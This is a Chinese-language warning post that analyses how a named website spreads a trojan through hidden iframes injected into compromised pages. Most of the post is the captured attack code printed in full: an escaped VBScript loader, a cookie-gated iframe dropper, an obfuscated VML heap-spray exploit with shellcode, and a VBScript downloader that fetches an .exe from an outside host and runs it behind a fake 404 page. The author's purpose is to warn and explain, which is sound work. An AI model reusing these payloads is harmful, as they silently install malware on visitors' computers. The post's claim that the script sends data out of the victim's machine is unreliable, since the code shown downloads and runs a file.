請大家警惕這個散播木馬的網站 www.zzyqr.com，本文簡要地分析了它通過網頁的傳播方式

經過我的觀察推測此網站通過工具掃描網站伺服器上是否有可以修改源檔案的安全漏洞，如果有再找出所有的index.htm檔案，然後在檔案的最後一行加上一個iframe簽入它網站上面植入木馬的頁面。

iframe标簽的代碼如下(文中将散播木馬的網站域名：“www.zzyqr.com”寫成“www.xxx.com”)：

<iframe src=http://www.xxx.com/lpf/wm.htm width=0 height=0 frameborder=0></iframe>

我們可以用flashget下載下傳它簽入頁面中的源檔案，代碼如下：

<script>

<!--

document.write(unescape("%3Chead%3E%3Ctitle%3Exh_New%20Year///%3C/title%3E%0D%0A%3Cscript%20language%3DVBScript%3E%0D%0Aon%20error%20resume%20next%0D%0Aset%20zero%20%3D%20document.createElement%28%22ob%22%20%26%20%22ject%22%29%0D%0Azero.setAttribute%20%22cl%22%20%26%20%22assid%22%2C%20%22cl%22%20%26%20%22sid%3ABD%22%20%26%20%2296C556-65A3-11D0-983A-00C04%22%20%26%20%22FC29E36%22%0D%0Astr3%20%3D%20%22Ad%22%20%26%20%22odb.St%22%20%26%20%22ream%22%0D%0Aset%20F%20%3D%20zero.createobject%28str3%2C%22%22%29%0D%0Aif%20Not%20Err.Number%20%3D%200%20then%0D%0Aerr.clear%0D%0Adocument.write%28%22%3Ci%22+%22frame%20style%3D%27display%3Anone%3B%27%20src%3D2007.htm%20width%3D1%20height%3D1%20frameborder%3D0%3E%3C/i%22+%22frame%3E%22%29%0D%0Aelse%0D%0Adocument.write%28%22%3Ci%22+%22frame%20style%3D%27display%3Anone%3B%27%20src%3DxiaoH.htm%20width%3D1%20height%3D1%20frameborder%3D0%3E%3C/i%22+%22frame%3E%22%29%0D%0Aend%20if%0D%0A%3C/script%3E%0D%0A%3C/head%3E%0D%0A%3C/html%3E%0D%0A%0D%0A%0D%0A"));

//-->

</script>

它将js代碼簡單的亂化了一下，但是可以看出來使用document.write向頁面上面寫東西，我們改成alert，看一下其真實代碼：

它用js向頁面上面寫了一段vsscript代碼，在vsscript代碼中試圖建立一個object，如果建立出錯的話，會用iframe簽入另外一個頁面2007.htm,否則就用iframe簽入xiaoH.htm檔案，下面我們下載下傳這兩個檔案，分别分析它的意圖。

2007.htm檔案中的代碼如下：

<script language="Javascript">

function Get()

{

var Then = new Date() 

Then.setTime(Then.getTime() + 24*60*60*1000)

var cookieString = new String(document.cookie)

var cookieHeader = "Cookie1=" 

var beginPosition = cookieString.indexOf(cookieHeader)

if (beginPosition != -1)

{ 

} else 

{ document.cookie = "Cookie1=POPWIN;expires="+ Then.toGMTString() 

inject = "<iframe style='display:none;' src=xiao.htm width=1 height=1 frameborder=0></iframe>"

setTimeout("document.write(inject)", 5000 );

}

}Get();

</script>

這個檔案中的代碼沒有經過任何亂化，這段代碼首先寫入一個一天之後過期的cookie，然後有簽入了另外一個頁面xiao.htm

xiao.htm檔案中的代碼如下：

xiao.htm

<html><title>歡迎購買xiao_2007 Vip網馬</title>

<script>

t="60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,74,97,118,97,83,99,114,105,112,116,34,62,13,10,115,99,109,97,105,110,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,51,52,51,37,117,52,51,52,51,37,117,52,51,52,51,37,117,97,51,101,57,37,117,48,48,48,48,37,117,53,102,48,48,37,117,97,49,54,52,37,117,48,48,51,48,37,117,48,48,48,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,54,56,37,117,102,55,56,98,37,117,48,52,54,97,37,117,101,56,53,57,37,117,48,48,52,51,37,117,48,48,48,48,37,117,102,57,101,50,37,117,54,102,54,56,37,117,48,48,54,101,37,117,54,56,48,48,37,117,55,50,55,53,37,117,54,100,54,99,37,117,102,102,53,52,37,117,57,53,49,54,37,117,50,101,101,56,37,117,48,48,48,48,37,117,56,51,48,48,37,117,50,48,101,99,37,117,100,99,56,98,37,117,50,48,54,97,37,117,102,102,53,51,37,117,48,52,53,54,37,117,48,52,99,55,37,117,53,99,48,51,37,117,50,101,54,49,37,117,99,55,54,53,37,117,48,51,52,52,37,117,55,56,48,52,37,117,48,48,54,53,37,117,51,51,48,48,37,117,53,48,99,48,37,117,53,51,53,48,37,117,53,48,53,55,37,117,53,54,102,102,37,117,56,98,49,48,37,117,53,48,100,99,37,117,102,102,53,51,37,117,48,56,53,54,37,117,53,54,102,102,37,117,53,49,48,99,37,117,56,98,53,54,37,117,51,99,55,53,37,117,55,52,56,98,37,117,55,56,50,101,37,117,102,53,48,51,37,117,56,98,53,54,37,117,50,48,55,54,37,117,102,53,48,51,37,117,99,57,51,51,37,117,52,49,52,57,37,117,48,51,97,100,37,117,51,51,99,53,37,117,48,102,100,98,37,117,49,48,98,101,37,117,100,54,51,97,37,117,48,56,55,52,37,117,99,98,99,49,37,117,48,51,48,100,37,117,52,48,100,97,37,117,102,49,101,98,37,117,49,102,51,98,37,117,101,55,55,53,37,117,56,98,53,101,37,117,50,52,53,101,37,117,100,100,48,51,37,117,56,98,54,54,37,117,52,98,48,99,37,117,53,101,56,98,37,117,48,51,49,99,37,117,56,98,100,100,37,117,56,98,48,52,37,117,99,53,48,51,37,117,53,101,97,98,37,117,99,51,53,57,37,117,53,56,101,56,37,117,102,102,102,102,37,117,56,101,102,102,37,117,48,101,52,101,37,117,99,49,101,99,37,117,101,53,55,57,37,117,57,56,98,56,37,117,56,97,102,101,37,117,101,102,48,101,37,117,101,48,99,101,37,117,51,54,54,48,37,117,50,102,49,97,37,117,54,56,55,48,37,117,55,52,55,52,37,117,51,97,55,48,37,117,50,102,50,102,37,117,55,55,55,55,37,117,50,101,55,55,37,117,55,55,55,50,37,117,55,55,55,54,37,117,50,101,55,54,37,117,54,102,54,51,37,117,50,102,54,100,37,117,54,51,54,100,37,117,54,98,50,102,37,117,50,101,54,55,37,117,55,56,54,53,37,117,48,48,54,53,34,41,59,115,52,99,61,115,99,109,97,105,110,43,109,121,117,114,108,59,13,10,115,107,49,112,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,68,48,68,37,117,48,68,48,68,34,41,59,104,115,49,122,101,32,61,32,50,48,59,13,10,115,99,49,101,110,32,61,32,104,115,49,122,101,43,115,52,99,46,108,101,110,103,116,104,13,10,119,104,105,108,101,32,40,115,107,49,112,46,108,101,110,103,116,104,60,115,99,49,101,110,41,32,115,107,49,112,43,61,115,107,49,112,59,13,10,115,107,105,105,112,32,61,32,115,107,49,112,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,99,49,101,110,41,59,13,10,120,105,97,111,95,50,48,48,55,32,61,32,115,107,49,112,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,107,49,112,46,108,101,110,103,116,104,45,115,99,49,101,110,41,59,13,10,119,104,105,108,101,40,120,105,97,111,95,50,48,48,55,46,108,101,110,103,116,104,43,115,99,49,101,110,60,48,120,52,48,48,48,48,41,32,120,105,97,111,95,50,48,48,55,32,61,32,120,105,97,111,95,50,48,48,55,43,120,105,97,111,95,50,48,48,55,43,115,107,105,105,112,59,13,10,109,101,109,116,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,13,10,32,105,61,48,59,119,104,105,108,101,40,43,43,105,60,53,48,48,41,123,109,101,109,116,91,105,93,32,61,32,120,105,97,111,95,50,48,48,55,32,43,32,115,52,99,59,125,13,10,118,97,114,32,97,49,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,100,48,100,34,41,59,13,10,118,97,114,32,98,50,59,13,10,102,111,114,40,105,61,48,59,32,105,60,48,120,49,48,48,45,49,57,59,32,105,43,43,41,32,32,98,50,43,61,97,49,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,104,116,109,34,43,34,108,32,120,109,108,110,115,58,118,61,92,34,117,114,34,43,34,110,58,115,99,104,101,109,34,43,34,97,115,45,109,105,99,34,43,34,114,111,115,111,102,116,45,99,111,109,58,118,34,43,34,109,108,92,34,62,92,114,92,110,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,104,101,97,100,62,92,114,92,110,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,105,100,61,92,34,86,77,34,43,34,76,82,101,110,100,101,114,92,34,32,99,108,97,115,115,105,100,61,92,34,67,76,83,73,68,58,49,48,48,34,43,34,55,50,67,69,67,45,56,67,34,43,34,67,49,45,49,49,68,49,45,57,34,43,34,56,54,69,45,48,34,43,34,48,65,48,67,57,34,43,34,53,53,66,52,50,69,92,34,62,92,114,92,110,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,47,111,98,106,101,99,116,62,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,116,121,108,101,62,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,118,92,92,58,42,32,123,32,98,101,104,97,118,105,111,114,58,32,117,114,108,40,35,86,77,76,82,101,110,100,101,114,41,59,32,125,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,47,115,116,121,108,101,62,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,47,104,101,97,100,62,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,118,58,114,101,99,116,32,115,116,121,108,101,61,39,119,105,100,116,104,58,49,50,48,112,116,59,104,101,105,103,104,116,58,56,48,112,116,39,32,102,105,108,108,99,111,108,111,114,61,92,34,103,114,101,101,110,92,34,62,92,114,92,110,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,118,58,102,105,108,108,32,109,101,116,104,111,100,61,92,34,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,98,50,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,117,110,101,115,99,97,112,101,40,34,37,117,48,99,48,99,37,117,48,100,48,100,34,41,41,59,13,10,102,111,114,40,105,61,48,59,105,60,49,48,48,59,105,43,43,41,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,98,50,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,92,34,32,47,62,60,47,118,58,114,101,99,116,62,34,41,13,10,60,47,115,99,114,105,112,116,62"

t=eval("String.fromCharCode("+t+")");

document.write(t);</script>

<script type="text/jscript">

function init() 

{document.writeln("<HEAD><TITLE>404 Not Found<\/TITLE><\/HEAD><BODY>");

document.writeln("<H1>Not Found<\/H1>The requested URL \/codebase\/dff was not found on this server.<P>");

document.writeln("<P>Additionally, a 404 Not Found");

document.writeln("error was encountered while trying to use an ErrorDocument to handle the request.");

document.writeln("<\/BODY>");}window.onload = init;

</script>

</body></html>

通過上面的代碼我們可以分析得到，此檔案又是用js寫了一些東西，然後居然要顯示一個404未找到的标題來蒙騙大家，讓我們看看他的js到底寫了一些什麼東西，看下圖。

我們可以分析出來這段代碼得最終目的是要在頁面上面寫一個object：VMLRender，從網上查到，此木馬正是利用了VMLRender中的漏洞。也就是說到這一步，如果我們的系統沒有打更新檔的，如果一切正常的話可能木馬已經被安裝了。

以上分析是第一個病毒頁面執行出錯的步驟，如果不出錯，就會跳到另外一個頁面xiaoh.htm,我們可以用flashget下載下傳得到xiaoH.htm中的内容：

<script language="VBScript">

On Error Resume Next

QnxyX="http://www.rwvwv.com/mc/kg.exe"

Set RJURL = document.createElement("object")

ccc="clsid:BD96":lll="C556-65":sss="A3-11D":iii="0-983A-00C":ddd="04FC29E36":xxx="Microsoft.X":mmm="MLHTTp"

RJURL.SetAttribute "classid", ccc&lll&sss&iii&ddd

OOBnPl=xxx&mmm

Set MKHbx = RJURL.CreateObject(OOBnPl,"")

MKHbx.Open "GET", QnxyX, False

MKHbx.Send

MQWLa="~I7PRUGI1VAC.CoM"

SEiDu="~V5SFDYCLNTK.VbS"

XpTvd="~V5SFDYCLNTK.VbS"

SS="Scripting."

cc="FileSyst"

rr="emObject"

Set Kpzwb = RJURL.createobject(SS&cc&rr,"")

Set SrHOx = Kpzwb.GetSpecialFolder(2)

MQWLa=Kpzwb.BuildPath(SrHOx,MQWLa)

SEiDu=Kpzwb.BuildPath(SrHOx,SEiDu)

RR="Adod"

NN="b.stream"

UoNfL=RR&NN

Set HSREb = RJURL.createobject(UoNfL,"")

HSREb.type=1

HSREb.Open

HSREb.Write MKHbx.ResponseBody

HSREb.Savetofile MQWLa,2

HSREb.Close

HSREb.Type=2

HSREb.Open

HSREb.WriteText  "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&MQWLa&""")"&vbCrLf&"Set Shell = Nothing"

HSREb.Savetofile SEiDu,2

HSREb.Savetofile "c:\\NTDETECT.EXE",2

HSREb.Close

WSjog="Shell.Applica"

Set Run = RJURL.createobject(WSjog&"tion","")

Run.ShellExecute SEiDu,"","","Open",0

</script></html><script type="text/jscript">

function init() 

{document.writeln("<HEAD><TITLE>404 Not Found<\/TITLE><\/HEAD><BODY>");

document.writeln("<H1>Not Found<\/H1>The requested URL \/codebase\/dff was not found on this server.<P>");

document.writeln("<P>Additionally, a 404 Not Found");

document.writeln("error was encountered while trying to use an ErrorDocument to handle the request.");

document.writeln("<\/BODY>");}window.onload = init;

</script>

病毒腳本在上面的頁面中建立了一個對象，然後從中毒的機器中取到了一些資料，然後發送到目标機器。還存了一個檔案：c:\NTDETECT.EXE.最後又僞裝了一下自己，給使用者顯示一個404未找到的提示資訊。

後記：

制造病毒的人是希望通過病毒的傳播給自己帶去财富，熊貓剛剛被捕，又有人頂風作案，實在是.......。